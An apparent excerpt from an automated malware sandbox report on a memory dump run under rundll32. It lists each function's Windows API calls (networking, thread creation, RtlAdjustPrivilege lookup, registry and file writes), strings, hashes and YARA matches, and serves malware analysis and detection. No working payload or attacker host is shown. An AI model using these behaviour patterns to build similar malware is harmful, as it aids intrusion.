                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,04ECDB8B,?,00000000,?,74E04C30), ref: 04ECDD9F
                                                                                    • WSAResetEvent.WS2_32(?,?,?,?,?,?,?,?,04ECDB8B,?,00000000,?,74E04C30), ref: 04ECDDDA
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                    • String ID:
                                                                                    • API String ID: 1862898202-3916222277
                                                                                    • Opcode ID: 39ad4fd90a2a8c50e45ff237f75db90e3b4f76d43370f78e49730a55b2dbb733
                                                                                    • Instruction ID: e25e7c9fb6c9347de359195ba04b62f169e06bcc6850c4cb0cbe332361c318e1
                                                                                    • Opcode Fuzzy Hash: 39ad4fd90a2a8c50e45ff237f75db90e3b4f76d43370f78e49730a55b2dbb733
                                                                                    • Instruction Fuzzy Hash: DB419371A007049FE7309F2ADE44BEABBF6AF90318F05562DDC5687680DBB6B406CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECEF50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 140networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 04ECEF73
                                                                                    • WSAGetLastError.WS2_32(?), ref: 04ECEF7F
                                                                                    • WSAResetEvent.WS2_32(?), ref: 04ECEFBA
                                                                                      • Part of subcall function 04EB7AB0: RaiseException.KERNEL32(C000001D,00000001,00000000,00000000,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04EB7ACE
                                                                                      • Part of subcall function 04EB7AB0: EnterCriticalSection.KERNEL32(?,00000004,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF693
                                                                                      • Part of subcall function 04EB7AB0: LeaveCriticalSection.KERNEL32(?,?,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6BB
                                                                                      • Part of subcall function 04EB7AB0: SetLastError.KERNEL32(0000139F,?,04EB83CB,80004005,?,04EB87E8,04EB8B5E,00000000,?), ref: 04ECF6C7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterEnumEventEventsExceptionLeaveNetworkRaiseReset
                                                                                    • String ID:
                                                                                    • API String ID: 1862898202-3916222277
                                                                                    • Opcode ID: 0e079e0108eafa98b899872f70a35a04f999c2fd3113367a786cb8e5780df7d4
                                                                                    • Instruction ID: ec08d8ed429c2f7c1be3715f80736d903447f6dea900f06b4431e052c808f6ed
                                                                                    • Opcode Fuzzy Hash: 0e079e0108eafa98b899872f70a35a04f999c2fd3113367a786cb8e5780df7d4
                                                                                    • Instruction Fuzzy Hash: 6341D3716007049BE720CF29DA057AAFBF6AF84718F05161DDD56877C0DBB5F8468B40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE07EA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\rUNdLl32.Exe,00000104), ref: 04EE082A
                                                                                    • _free.LIBCMT ref: 04EE08F5
                                                                                    • _free.LIBCMT ref: 04EE08FF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Windows\SysWOW64\rUNdLl32.Exe
                                                                                    • API String ID: 2506810119-2716102475
                                                                                    • Opcode ID: 82de1ce9bde632250f4799763d88e2a71628ce76d585e83422723e29d3a8312c
                                                                                    • Instruction ID: 59951251a9a33f3f157e9b33779ba7b7b6515f65c754180b85e7e9b332e036ce
                                                                                    • Opcode Fuzzy Hash: 82de1ce9bde632250f4799763d88e2a71628ce76d585e83422723e29d3a8312c
                                                                                    • Instruction Fuzzy Hash: B9315471A0026CEFEB21DF9AD884DBEBBFCEF85314F105166E50497200D6B4AE81DB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB52C0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB53C4
                                                                                    • lstrlenW.KERNEL32(?,?), ref: 04EB52D8
                                                                                      • Part of subcall function 04EB53D0: lstrlenW.KERNEL32(?,00000007), ref: 04EB5402
                                                                                      • Part of subcall function 04EB53D0: wsprintfW.USER32 ref: 04EB542F
                                                                                      • Part of subcall function 04EB53D0: FindFirstFileW.KERNEL32(?,?), ref: 04EB5446
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$FileFindFirstXinvalid_argumentstd::_wsprintf
                                                                                    • String ID: %s%s%s$list<T> too long
                                                                                    • API String ID: 614760719-961022205
                                                                                    • Opcode ID: 41a9cff61975acbe5b823d25b4ca6fafa2a649534c6495897200b9b287e373f6
                                                                                    • Instruction ID: 56bc301850dfe162f7c3704717455f916af6550a32730d3313e9ec1b7053ffd3
                                                                                    • Opcode Fuzzy Hash: 41a9cff61975acbe5b823d25b4ca6fafa2a649534c6495897200b9b287e373f6
                                                                                    • Instruction Fuzzy Hash: 8831CE74A00208ABCB18EF68C850AFFB7F5FF88208F50951DE84697244DBB5B941CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB92E0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 04EB7970: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,04ECB4C6), ref: 04EB79A0
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 04EB79B2
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 04EB79C5
                                                                                      • Part of subcall function 04EB7970: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 04EB79D8
                                                                                    • CreateEventW.KERNEL32(00000000,00000001), ref: 04EB93B1
                                                                                    • CloseHandle.KERNEL32(04EFD8B0,00000000,00000001,0000003F), ref: 04EB940B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                    • String ID: C$J
                                                                                    • API String ID: 1850149996-3934036899
                                                                                    • Opcode ID: b745c22e6fe9465f2713e20d798394f79e110e57eac100e3771fb0fcfb0787c7
                                                                                    • Instruction ID: 853ac525dc9a8e7deb2ede31245eda222041e4f54da2556a6007eb89383a9b88
                                                                                    • Opcode Fuzzy Hash: b745c22e6fe9465f2713e20d798394f79e110e57eac100e3771fb0fcfb0787c7
                                                                                    • Instruction Fuzzy Hash: 9C4137B11083419BE710DF64D859B6BBBE4BF80748F10591CFAA19A290D775E509CFD3
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBE3F0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 101threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00000000,04EBE2D0,?,00000000,00000000), ref: 04EBE506
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: conf$dbug$init
                                                                                    • API String ID: 2422867632-3701578037
                                                                                    • Opcode ID: d7eee07a1285dce98dca436f705577eeb256c6a40caaec4914a6955f15359ca6
                                                                                    • Instruction ID: 963df361bf071468b5a9f277b565d1cefcdf5fe2343813f853409b0927f88228
                                                                                    • Opcode Fuzzy Hash: d7eee07a1285dce98dca436f705577eeb256c6a40caaec4914a6955f15359ca6
                                                                                    • Instruction Fuzzy Hash: D8316F316007009FE724AB68DD04FEB76E5AF84719F046938E2868B590DAB1F846CBD2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC40A0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04EC40C0
                                                                                    • TerminateThread.KERNEL32(?,00000000), ref: 04EC40CB
                                                                                    • TerminateProcess.KERNEL32(?,00000001), ref: 04EC40D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Terminate$MultipleObjectsProcessThreadWait
                                                                                    • String ID: 0et
                                                                                    • API String ID: 2979846252-2725761952
                                                                                    • Opcode ID: 73f3808a5066d9c0d7f8027130be52c8afb056026ffd4204315ee6ebae23ff09
                                                                                    • Instruction ID: 441039284f1b5316114a530efb68b5a875d2d67cc7ff2019434ace2f17f71617
                                                                                    • Opcode Fuzzy Hash: 73f3808a5066d9c0d7f8027130be52c8afb056026ffd4204315ee6ebae23ff09
                                                                                    • Instruction Fuzzy Hash: A2011976641204AFEB20DF59DA59FAABBF4EF08705F0042ADF94A9B691D771E804CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECAA20, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 04ECAA2B
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04ECAA37
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 2574300362-64178277
                                                                                    • Opcode ID: 7e1c6f278ce3bbb6078cd7a82744747583be7404b8057037e696524aa9cc6a1d
                                                                                    • Instruction ID: 45d089b5c88d63f6845365ae159ad0a332cb258eff33cdf3f836862a0244ad73
                                                                                    • Opcode Fuzzy Hash: 7e1c6f278ce3bbb6078cd7a82744747583be7404b8057037e696524aa9cc6a1d
                                                                                    • Instruction Fuzzy Hash: 9CE0863278120E37DA18AAF56D0BB76775C9740706F00126CBE09D50C0FD95B91046A1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEAF6C, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 4bcd9fe46bf59cd1f47d8b967cb1d371abdb387b6f20d2d4fea56d91c9eb0d99
                                                                                    • Instruction ID: 4dead6125e6458ca4948cb584fbe76f1772a0f4278afdaee59d7b012ff8e6680
                                                                                    • Opcode Fuzzy Hash: 4bcd9fe46bf59cd1f47d8b967cb1d371abdb387b6f20d2d4fea56d91c9eb0d99
                                                                                    • Instruction Fuzzy Hash: EAA1A872A00386DFEB26CF2AC8807BEFBE1EF05358F1852ADD5959B281D235B941C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1510, Relevance: 6.3, APIs: 5, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED1524
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04ED1546
                                                                                    • SetLastError.KERNEL32(0000139F), ref: 04ED155A
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1561
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalErrorLastSection$EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 2124651672-0
                                                                                    • Opcode ID: 5efbf3604d0ae494846ba967b38f7199a25293cb5b232c714e1d6d48173efc5e
                                                                                    • Instruction ID: 0f02c3227d725a3e6c7c54011f84084064438ce82c320881a34ee3fc53cf8c48
                                                                                    • Opcode Fuzzy Hash: 5efbf3604d0ae494846ba967b38f7199a25293cb5b232c714e1d6d48173efc5e
                                                                                    • Instruction Fuzzy Hash: CA01483A341505EBC3049F1AE8049A5B79AFFC5336F014226EA358B2D0CB75A951C7A0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EEBF2A, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,04EEAAF0,?,00000000,00000001,00000001,?,?,00000001,04EEAAF0,?), ref: 04EEBF77
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04EEC000
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,04EDF651,?), ref: 04EEC012
                                                                                    • __freea.LIBCMT ref: 04EEC01B
                                                                                      • Part of subcall function 04EE8193: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,04EE91A3,00000001,00000000,?,04EE13EE,00000001,00000004,00000000,00000001,?,?,04EE0FAC), ref: 04EE81C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 573072132-0
                                                                                    • Opcode ID: 7b33d13cf80ac82b3170eb40e6328863af18dfaabd3204d33f2107d143f181de
                                                                                    • Instruction ID: 59620daf3f00ed8646af69552d2ff6c10d336ead5b6f4be4cd18e00eaa808f4a
                                                                                    • Opcode Fuzzy Hash: 7b33d13cf80ac82b3170eb40e6328863af18dfaabd3204d33f2107d143f181de
                                                                                    • Instruction Fuzzy Hash: C2319C32A0020AAFDB24DF66DC45DBE7BA5EF40354B144128FC19DB290EB35ED51CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECD1F0, Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 04ECD24C
                                                                                    • GetLastError.KERNEL32(?,00000000,00000000), ref: 04ECD25D
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 04ECD279
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 04ECD2A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 83d5566a275bda4e06f490160beee29f7eea8c60eb280f6df93adde768674d40
                                                                                    • Instruction ID: db9da0f2ca99fec997875d9e15799c52d9c1276368cd45554d0b0b38ae4b070a
                                                                                    • Opcode Fuzzy Hash: 83d5566a275bda4e06f490160beee29f7eea8c60eb280f6df93adde768674d40
                                                                                    • Instruction Fuzzy Hash: D82144726001057FEB244F44DD44FAABB69EF04B54F208125FD199B280EB72FD208790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC10B0, Relevance: 6.1, APIs: 4, Instructions: 85registrymemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 04EC110C
                                                                                    • RegCreateKeyExW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC1147
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC115A
                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,00000000,00000000,00000000,00000000,00000104,00000000,00000000,00000000), ref: 04EC1178
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AllocCloseCreateFree
                                                                                    • String ID:
                                                                                    • API String ID: 1942913825-0
                                                                                    • Opcode ID: 58453ea5756bfda1aabc3b3d43f7f12158fb4c18960305ee93d8d541d3323bcd
                                                                                    • Instruction ID: d620b36bb4abf7a69dc7d1a1c9be090f1f99aabdb9cba16c5083b74106deb166
                                                                                    • Opcode Fuzzy Hash: 58453ea5756bfda1aabc3b3d43f7f12158fb4c18960305ee93d8d541d3323bcd
                                                                                    • Instruction Fuzzy Hash: 0F2173B5A00208BBEB00DF65CC45FAEBBB8EF44354F10C165F915AB281D675AA05CF90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED1740, Relevance: 6.1, APIs: 4, Instructions: 84networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,04ED14D9,?,?,?,?), ref: 04ED175C
                                                                                    • WSASetLastError.WS2_32(0000000D), ref: 04ED17EE
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED17F5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterErrorLastLeave
                                                                                    • String ID:
                                                                                    • API String ID: 4082018349-0
                                                                                    • Opcode ID: e475be91ca2fa318f895b0f1e5ae571c98ac0fdd701a8aa95b8da1d57a983393
                                                                                    • Instruction ID: 32d8b5b89c455ee190b3aacf8616146b259161082eb84a276eaf22f566f8da77
                                                                                    • Opcode Fuzzy Hash: e475be91ca2fa318f895b0f1e5ae571c98ac0fdd701a8aa95b8da1d57a983393
                                                                                    • Instruction Fuzzy Hash: 7821F8763002059BEB10CF64EC84AAEB7A5FF85329F109525FD16CB256DB32F852CB51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB5910, Relevance: 6.1, APIs: 4, Instructions: 80fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000,?), ref: 04EB5964
                                                                                    • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 04EB5979
                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 04EB598C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 04EB5993
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: faec1220f253b8ed550f67e8eaf2d825fdeedada850528835e804087d45487eb
                                                                                    • Instruction ID: 232181edb99bf1e901dc4c9bfa85a8e33c1212d31f76599edf4c1a6a64ce777c
                                                                                    • Opcode Fuzzy Hash: faec1220f253b8ed550f67e8eaf2d825fdeedada850528835e804087d45487eb
                                                                                    • Instruction Fuzzy Hash: 76217371A01209BFEB00DFA4CC45FEEB7B8FF48714F104159E614AB280D775AA45CBA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED4F30, Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 04ED4F80
                                                                                    • InterlockedCompareExchange.KERNEL32(?,?,?), ref: 04ED4F92
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CompareExchangeInterlocked
                                                                                    • String ID:
                                                                                    • API String ID: 3335655927-0
                                                                                    • Opcode ID: af9e02c6bf04c39d14f3c18592b1ce8e4a1e1beda61459b52eb810ecb91b2a0f
                                                                                    • Instruction ID: b2082a09625d4f4d54d3009fa50fb4c75bd32f60e8c7239977cbc46f1d8e57f5
                                                                                    • Opcode Fuzzy Hash: af9e02c6bf04c39d14f3c18592b1ce8e4a1e1beda61459b52eb810ecb91b2a0f
                                                                                    • Instruction Fuzzy Hash: CF214D72604609AFDB24DF69D980F96F3EDFB59310F40496EEA99C7240DA31F914CBA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECF180, Relevance: 6.1, APIs: 4, Instructions: 65networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • recv.WS2_32(?,?,?,00000000), ref: 04ECF1A3
                                                                                    • SetLastError.KERNEL32(00000000), ref: 04ECF1AD
                                                                                    • GetLastError.KERNEL32 ref: 04ECF1C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$recv
                                                                                    • String ID:
                                                                                    • API String ID: 316788870-0
                                                                                    • Opcode ID: e20bf23ffc8bcc146353b7e447b8fe79fa8f28d743900d584a2427cee61127c5
                                                                                    • Instruction ID: 81c11f2422856e09e669aee69efcef967178c8f209b10f92e1bcb6f7596ca7ba
                                                                                    • Opcode Fuzzy Hash: e20bf23ffc8bcc146353b7e447b8fe79fa8f28d743900d584a2427cee61127c5
                                                                                    • Instruction Fuzzy Hash: B6119B722017009FD7308F5DD548797B7F6EB84329F104A2EE556C66D0CBB9F48A9B50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECE730, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,00000000,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE73E
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE750
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE7BD
                                                                                    • SetEvent.KERNEL32(?,?,04ECE5D4,?,?,00000000,?,?,00000000), ref: 04ECE7D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: b4dffa4e7e52580628aa466365c3c7edc691b099fc67d3f72eb0b7714f3df471
                                                                                    • Instruction ID: def1c61436d20263279f826d91a76da8508d34ce4cb61adf3ee9855fb172a13a
                                                                                    • Opcode Fuzzy Hash: b4dffa4e7e52580628aa466365c3c7edc691b099fc67d3f72eb0b7714f3df471
                                                                                    • Instruction Fuzzy Hash: 83111971201605AFD708CF29D988BE6FBA8FF59315F01822EE5198B241DB36E912CBD0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EE8C9E, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId), ref: 04EE8CD0
                                                                                    • GetLastError.KERNEL32(?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId,04EF91F0,GetCurrentPackageId,00000000), ref: 04EE8CDC
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,04EE8C45,?,00000001,00000000,?,?,04EE910D,00000008,GetCurrentPackageId,04EF91F0,GetCurrentPackageId,00000000), ref: 04EE8CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 031635c9ab97bd4a73e4b8f41b4433a2c91debe011edc0c60cfafc1df5ab3e57
                                                                                    • Instruction ID: 8b420776ed60232324bfa66c951c3d6329f8b3ee4df7a32a06a6129e53d6eb38
                                                                                    • Opcode Fuzzy Hash: 031635c9ab97bd4a73e4b8f41b4433a2c91debe011edc0c60cfafc1df5ab3e57
                                                                                    • Instruction Fuzzy Hash: 8E012032712223ABD7319E6BAC44A77379DFF957A57101620FD06D3140E725EC04C6E0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECA040, Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,74B5F690,74B5F660,?,?,04ECA746), ref: 04ECA05C
                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,04ECA746), ref: 04ECA06D
                                                                                    • WriteFile.KERNEL32(00000000,04F03D18,00001600,04ECA746,00000000,?,04ECA746), ref: 04ECA08B
                                                                                    • CloseHandle.KERNEL32(00000000,?,04ECA746), ref: 04ECA09C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3604237281-0
                                                                                    • Opcode ID: 80348fed174b4c6921a0b36965c92096ed2cb31c78972be28ada5c546b5d5f64
                                                                                    • Instruction ID: ffe50cf4fbd195eb72ce99430f144081db72d905751ecb2f7474ee18ba512a93
                                                                                    • Opcode Fuzzy Hash: 80348fed174b4c6921a0b36965c92096ed2cb31c78972be28ada5c546b5d5f64
                                                                                    • Instruction Fuzzy Hash: 2BF06871743128B7D2309A569C0DFBB7EACDFC6BB2F104269BD19D2184D9659C0292F0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EF1EA9, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 04EF1EC0
